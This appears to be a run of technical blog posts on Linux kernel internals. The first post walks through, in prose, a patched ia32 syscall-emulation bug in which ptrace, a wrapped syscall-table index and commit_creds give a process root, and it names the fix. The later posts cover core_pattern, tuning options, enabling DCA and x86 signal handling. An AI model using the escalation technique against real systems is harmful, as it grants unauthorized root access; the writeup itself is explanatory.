ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

Software interrupt 0x80.

The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

tl;dr

This post will describe how I stumbled upon a code path in the Linux kernel which allows external programs to be launched when a core dump is about to happen. I provide a link to a short and ugly Ruby script which captures a faulting process, runs gdb to get a backtrace (and other information), captures the core dump, and then generates a notification email.

Your processes may get automatically restarted when a fault occurs and you may even get an email letting you know your process died. Both of those things are useful, but it turns out that with just a tiny bit of extra work you can actually get very detailed emails showing a stack trace, register information, and a snapshot of the process’ files in /proc.

random walking the linux kernel

One day I was sitting around wondering how exactly the coredump code paths are wired. I cracked open the kernel source and started reading.

In the above code, core_pattern (which can be set with a sysctl or via /proc/sys/kernel/core_pattern) to determine if the first character is a |. If so, format_corename returns 1. So | seems relatively important, but at this point I’m still unclear on what it actually means.

Scanning the rest of the code for do_coredump reveals something very interesting3 (this is more code from the function in the first code snippet above):

WTF?call_usermodehelper_fns? umh_pipe_setup? This is looking pretty interesting. If you follow the code down a few layers, you end up at call_usermodehelper_exec which has the following very enlightening comment:

/**
* call_usermodehelper_exec - start a usermode application
*
* . . .
*
* Runs a user-space application. The application is started
* asynchronously if wait is not set, and runs as a child of keventd.
* (ie. it runs with full root capabilities).
*/

what it all means

All together this is actually pretty fucking sick:

You can set /proc/sys/kernel/core_pattern to run a script when a process is going to dump core.

Your script is run before the process is killed.

A pipe is opened and attached to your script. The kernel writes the coredump to the pipe. Your script can read it and write it to storage.

Your script can attach GDB, get a backtrace, and gather other information to send a detailed email.

But the coolest part of all:

All of the files in /proc/[pid] for that process remain intact and can be inspected. You can check the open file descriptors, the process’s memory map, and much much more.

ruby codez to harness this amazing code path

I whipped up a pretty simple, ugly, ruby script. You can get it here. I set up my system to use it by:

Why didn’t you read the documentation instead?

This (as far as I can tell) little-known feature is documented at linux-kernel-source/Documentation/sysctl/kernel.txt under the “core_pattern” section. I didn’t read the documentation because (little known fact) I actually don’t know how to read. I found the code path randomly and it was much more fun an interesting to discover this little feature by diving into the code.

Conclusion

This could/should probably be a feature/plugin/whatever for god/monit/etc instead of a stand-alone script.

Reading code to discover features doesn’t scale very well, but it is a lot more fun than reading documentation all the time. Also, you learn stuff and reading code makes you a better programmer.

This article is going to address some kernel and driver tweaks that are interesting and useful. We use several of these in production with excellent performance, but you should proceed with caution and do research prior to trying anything listed below.

Tickless System

The tickless kernel feature allows for on-demand timer interrupts. This means that during idle periods, fewer timer interrupts will fire, which should lead to power savings, cooler running systems, and fewer useless context switches.

Kernel option: CONFIG_NO_HZ=y

Timer Frequency

You can select the rate at which timer interrupts in the kernel will fire. When a timer interrupt fires on a CPU, the process running on that CPU is interrupted while the timer interrupt is handled. Reducing the rate at which the timer fires allows for fewer interruptions of your running processes. This option is particularly useful for servers with multiple CPUs where processes are not running interactively.

Kernel options: CONFIG_HZ_100=y and CONFIG_HZ=100

Connector

The connector module is a kernel module which reports process events such as fork, exec, and exit to userland. This is extremely useful for process monitoring. You can build a simple system (or use an existing one like god) to watch mission-critical processes. If the processes die due to a signal (like SIGSEGV, or SIGBUS) or exit unexpectedly you’ll get an asynchronous notification from the kernel. The processes can then be restarted by your monitor keeping downtime to a minimum when unexpected events occur.

Kernel options: CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y

TCP segmentation offload (TSO)

A popular feature among newer NICs is TCP segmentation offload (TSO). This feature allows the kernel to offload the work of dividing large packets into smaller packets to the NIC. This frees up the CPU to do more useful work and reduces the amount of overhead that the CPU passes along the bus. If your NIC supports this feature, you can enable it with ethtool:

Intel I/OAT DMA Engine

This kernel option enables the Intel I/OAT DMA engine that is present in recent Xeon CPUs. This option increases network throughput as the DMA engine allows the kernel to offload network data copying from the CPU to the DMA engine. This frees up the CPU to do more useful work.

There’s also a sysfs interface where you can get some statistics about the DMA engine. Check the directories under /sys/class/dma/.

Kernel options: CONFIG_DMADEVICES=y and CONFIG_INTEL_IOATDMA=y and CONFIG_DMA_ENGINE=y and CONFIG_NET_DMA=y and CONFIG_ASYNC_TX_DMA=y

Direct Cache Access (DCA)

Intel’s I/OAT also includes a feature called Direct Cache Access (DCA). DCA allows a driver to warm a CPU cache. A few NICs support DCA, the most popular (to my knowledge) is the Intel 10GbE driver (ixgbe). Refer to your NIC driver documentation to see if your NIC supports DCA. To enable DCA, a switch in the BIOS must be flipped. Some vendors supply machines that support DCA, but don’t expose a switch for DCA. If that is the case, see my last blog post for how to enable DCA manually.

You can check if DCA is enabled:

[joe@timetobleed]% dmesg | grep dca
dca service started, version 1.8

If DCA is possible on your system but disabled you’ll see:

ioatdma 0000:00:08.0: DCA is disabled in BIOS

Which means you’ll need to enable it in the BIOS or manually.

Kernel option: CONFIG_DCA=y

NAPI

The “New API” (NAPI) is a rework of the packet processing code in the kernel to improve performance for high speed networking. NAPI provides two major features1:

Interrupt mitigation: High-speed networking can create thousands of interrupts per second, all of which tell the system something it already knew: it has lots of packets to process. NAPI allows drivers to run with (some) interrupts disabled during times of high traffic, with a corresponding decrease in system load.

Packet throttling: When the system is overwhelmed and must drop packets, it’s better if those packets are disposed of before much effort goes into processing them. NAPI-compliant drivers can often cause packets to be dropped in the network adaptor itself, before the kernel sees them at all.

Many recent NIC drivers automatically support NAPI, so you don’t need to do anything. Some drivers need you to explicitly specify NAPI in the kernel config or on the command line when compiling the driver. If you are unsure, check your driver documentation. A good place to look for docs is in your kernel source under Documentation, available on the web here: http://lxr.linux.no/linux+v2.6.30/Documentation/networking/ but be sure to select the correct kernel version, first!

Throttle NIC Interrupts

Some drivers allow the user to specify the rate at which the NIC will generate interrupts. The e1000e driver allows you to pass a command line option InterruptThrottleRate

when loading the module with insmod. For the e1000e there are two dynamic interrupt throttle mechanisms, specified on the command line as 1 (dynamic) and 3 (dynamic conservative). The adaptive algorithm traffic into different classes and adjusts the interrupt rate appropriately. The difference between dynamic and dynamic conservative is the the rate for the “Lowest Latency” traffic class, dynamic (1) has a much more aggressive interrupt rate for this traffic class.

As always, check your driver documentation for more information.

With modprobe: insmod e1000e.o InterruptThrottleRate=1

Process and IRQ affinity

Linux allows the user to specify which CPUs processes and interrupt handlers are bound.

Processes You can use taskset to specify which CPUs a process can run on

Interrupt Handlers The interrupt map can be found in /proc/interrupts, and the affinity for each interrupt can be set in the file smp_affinity in the directory for each interrupt under /proc/irq/

This is useful because you can pin the interrupt handlers for your NICs to specific CPUs so that when a shared resource is touched (a lock in the network stack) and loaded to a CPU cache, the next time the handler runs, it will be put on the same CPU avoiding costly cache invalidations that can occur if the handler is put on a different CPU.

However, reports2 of up to a 24% improvement can be had if processes and the IRQs for the NICs the processes get data from are pinned to the same CPUs. Doing this ensures that the data loaded into the CPU cache by the interrupt handler can be used (without invalidation) by the process; extremely high cache locality is achieved.

oprofile

oprofile is a system wide profiler that can profile both kernel and application level code. There is a kernel driver for oprofile which generates collects data in the x86′s Model Specific Registers (MSRs) to give very detailed information about the performance of running code. oprofile can also annotate source code with performance information to make fixing bottlenecks easy. See oprofile’s homepage for more information.

Kernel options: CONFIG_OPROFILE=y and CONFIG_HAVE_OPROFILE=y

epoll

epoll(7) is useful for applications which must watch for events on large numbers of file descriptors. The epoll interface is designed to easily scale to large numbers of file descriptors. epoll is already enabled in most recent kernels, but some strange distributions (which will remain nameless) have this feature disabled.

Kernel option: CONFIG_EPOLL=y

Conclusion

There are a lot of useful levers that can be pulled when trying to squeeze every last bit of performance out of your system

It is extremely important to read and understand your hardware documentation if you hope to achieve the maximum throughput your system can achieve

You can find documentation for your kernel online at the Linux LXR. Make sure to select the correct kernel version because docs change as the source changes!

This blog post is going to describe a C program that toggles some CPU and chipset registers directly to enable Direct Cache Access without needing a reboot or a switch in the BIOS. A very fun hack to write and investigate.

Special thanks…

Special thanks going out to Roman Nurik for helping me make the code CSS much, much prettier and easier to read.

Special thanks going out to Jake Douglas for convincing me that I shouldn’t use a stupid sensationalist title for this blog article :)

Intel I/OAT and Direct Cache Access (DCA)

I/OAT (I/O Acceleration Technology) is the name for a collection of techniques by Intel to improve network throughput. The most significant of these is the DMA engine. The DMA engine is meant to offload from the CPU the copying of [socket buffer] data to the user buffer. This is not a zero-copy receive, but does allow the CPU to do other work while the copy operations are performed by the DMA engine.

Cool! So by using I/OAT the network stack in the Linux kernel can offload copy operations to increase throughput. I/OAT also includes a feature called Direct Cache Access (DCA) which can deliver data directly into processor caches. This is particularly cool because when a network interrupt arrives and data is copied to system memory, the CPU which will access this data will not cause a cache-miss on the CPU because DCA has already put the data it needs in the cache. Sick.

Measurements from the Linux Foundation project2 indicate a 10% reduction in CPU usage, while the Myri-10G NIC website claims they’ve measured a 40% reduction in CPU usage3. For more information describing the performance benefits of DCA see this incredibly detailed paper: Direct Cache Access for High Bandwidth Network I/O.

How to get I/OAT and DCA

To get I/OAT and DCA you need a few things:

Intel XEON CPU(s)

A NIC(s) which has DCA support

A chipset which supports DCA

The ioatdma and dca Linux kernel modules

And last but not least, a switch in your BIOS to turn DCA on

That last item can actually be a bit more tricky than it sounds for several reasons:

some BIOSes don’t expose a way to turn DCA on even though it is supported by the CPU, chipset, and NIC!

Your hosting provider may not allow BIOS access

Your system might be up and running and you don’t want to reboot to enter the BIOS to enable DCA

Let’s see what you can do to coerce DCA into working on your system if one of the above applies to you.

Build ioatdma kernel module

This is pretty easy, just make menuconfig and toggle I/OAT as a module. You must build it as a module if you cannot or do not want to enable DCA in your BIOS.

The option can be found in Device Drivers -> DMA Engine Support -> Intel I/OAT DMA Support.

Toggling that option will build the ioatdma and dca modules. Build and install the new module.

Enabling DCA without a reboot or BIOS access: Hack overview

In order to enable DCA a few special registers need to be touched.

The DCA capability bit in the PCI Express Control Register 4 in the configuration space for the PCI bridge your NIC(s) are attached to.

The DCA Model Specific Register on your CPU(s)

Let’s take a closer look at each stage of the hack.

Enable DCA in PCI Configuration Space

PCI configuration space is a memory region where control registers for PCI devices live. By changing register values, you can enable/disable specific features of that PCI device. The configuration space is addressable if you know the PCI bus, device, and function bits for a specific PCI device and the feature you care about.

To find the DCA register for the Intel 5000, 5100, and 7300 chipsets, we need to consult the documentation4:

Cool, so the register needed lives at offset 0×64. To enable DCA, bit 6 needs to be set to 1.

Toggling these register can be a bit cumbersome, but luckily there is libpci which provides some simple APIs to scan for PCI devices and accessing configuration space registers.

Enable DCA in the CPU MSR

A model specific register (MSR) is a control register that is provided by a CPU to enable a feature that exists on a specific CPU. In this case, we care about the DCA MSR. In order to find it’s address, let’s consult the Intel Developer’s Manual 3B5.

This register lives at offset 0x1f8. We just need to set it to 1 and we should be good to go.

Another post about signal handling?

There are probably lots of people who have blogged about signal handling in Linux, but this series is going to be different. In this blog post, I’m going to unravel the signal handling code paths in the Linux kernel starting at the hardware level, working though the kernel, and ending in the userland signal handler. I’ve tried to use footnotes for code samples which have links to the code in the Linux lxr. Many of the code examples have been snipped for brevity.

As always, this post is specific to the x86_64 CPU architecture and Linux kernel 2.6.29.

Hardware or software generated

Signals are not generated directly by hardware, but certain hardware states can cause the Linux kernel to generate signals. As such we can imagine two ways to generate signals:

Hardware – the CPU does something bad (divides by 0, touches a bad address, etc) which causes the kernel to create and deliver (unless the signal is SIGKILL or SIGSTOP, of course) a signal (SIGFPE, SIGSEGV, etc) to the running process.

Software – an application executes a kill() system call and sends a signal to a specific process.

Both types of signals share a common code path, but hardware generated signals have a very interesting birth. Let’s start there and as we work our way up to userland we’ll stumble into the software signal code path along the way.

Exceptions on the x86

Let’s start by first understanding what an x86 exception is. For that, we’ll turn to the documentation1:

[...] exceptions are events that indicate that a condition exists somewhere in the system, the processor, or within the currently executing program or task that requires the attention of a processor. They typically result in a forced transfer of execution from the currently running program or task to a special software routine [...] or an exception handler.

At a high level this is pretty simple to understand; the system gets in a weird state and the CPU immediately begins executing a predefined handler function to try to fix things (if it can) or die gracefully.

Let’s take a look at how the kernel creates and installs handler functions that the CPU executes when an exception occurs.

Low-level exception handlers

Low level exception handlers are specified in the Interrupt Descriptor Table (IDT). The IDT can hold up to 256 entries and it can live anywhere in memory. Each entry in the IDT is mapped to a different exception. For example, #DE Divide Error is the first entry in the IDT, IDT[0]; #PF Page Fault ‘s handler lives at IDT[14]. When a specific exception is encountered, the CPU looks up the handler function in the IDT, puts some data on the stack, and executes the handler.

What does an entry in the IDT look like? Let’s take a look at a picture2 from Intel:

Take a look at the fields labeled ‘Offset’ – this is field that contains the address of the function to execute. As you can see, there are three fields labeled ‘Offset.’ Can you guess why?

In order to actually set the address of the function you want to execute, you’ll need to do some bit-shifting. Each ‘Offset’ field is indicates which bits of the address of the handler function it wants. You need to be really careful when writing the code that is responsible for creating IDT entries. A bug here could cause your system to do really bizarre things.

We know what an IDT entry looks like, but what about the data that the CPU pushes on the stack before executing a handler? Unfortunately, I couldn’t track down a picture of what the x86_64 puts on the stack and I can’t draw. So, here is a picture of the data the x86 CPU puts on the stack from Intel3:

When an exception occurs, the CPU pushes the stack pointer, the CPU flags register value, the code and stack segment selectors, and the instruction pointer on to the stack before executing the handler.

Nice, but where does the IDT itself live?

The address of the IDT is stored in a CPU register that can be accessed with the instructions lidt and sidt to load and store (respectively) the address of the IDT. Usually, the address of the IDT is set during the initialization of the kernel.

Cool, so Linux creates a bunch of early handlers in case something goes bad during boot and then a few function calls later (not shown), Linux calls start_kernel()5, which calls trap_init()6 for your architecture which actually sets the handlers.

This is pretty important, so let's take a look at the code for this. Thankfully, Linux includes some descriptive function names, so we can see which exceptions are being set.

So the macro uses the first argument sym as the name of the function, and the second argument do_sym is a C function that is called from this assembly stub.

We also notice from the stub above a very important (and somewhat subtle) piece of code: movq %rsp,%rdi This piece of code puts the address of the stack pointer in %rdi and we'll see why shortly. First, let's look at how the macro is used to get a better idea how it works:

This block of code uses the macro above to create symbols named divide_error, overflow, and more which call out to C functions named do_divide_error, do_overflow, etc. The craziness doesn't end there. These C functions are also generated with macros9:

Those last two lines get substituted with the macro above, creating do_overflow, do_bounds, and more. As you might have noticed, the functions generated have dotraplinkage which is a macro for a gcc attribute regparm which tells gcc to pass arguments to the function in registers and not on the stack.

Remember the movq %rsp,%rdi from the common assembly stub? That line of code exists to pass the address of the state the CPU dumped to the do_* functions via the %rdi register.

The do_* functions notify interested parties about the exception, re-enable interrupts/exceptions if they were disabled, and finally tells the upper layer signal handling code of the kernel that a signal should be generated and hands over the associated CPU state at the time the exception was generated.

Conclusion for Part 1

Wow. What a wild ride that was.

There is a lot of trickery and subtle hacks in the Linux kernel. Reading and understanding the code can make you a more clever programmer. Dig in!

It is pretty cool (imho) to understand how you actually converse with the CPU and how the CPU talks to the kernel, and how that data is pushed to the upper layers.

The Intel CPU manuals, the gcc man page, and the Linux lxr are a big time help for deciphering this code, which can be cryptic at times.

Understanding what information you have at your disposal can let you do pretty crazy things in userland, as we'll see in the next piece of this series.

Stay tuned, in the next piece of this series I'll walk through the signal handling code in the kernel and show some crazy non-portable tricks you can do in userland.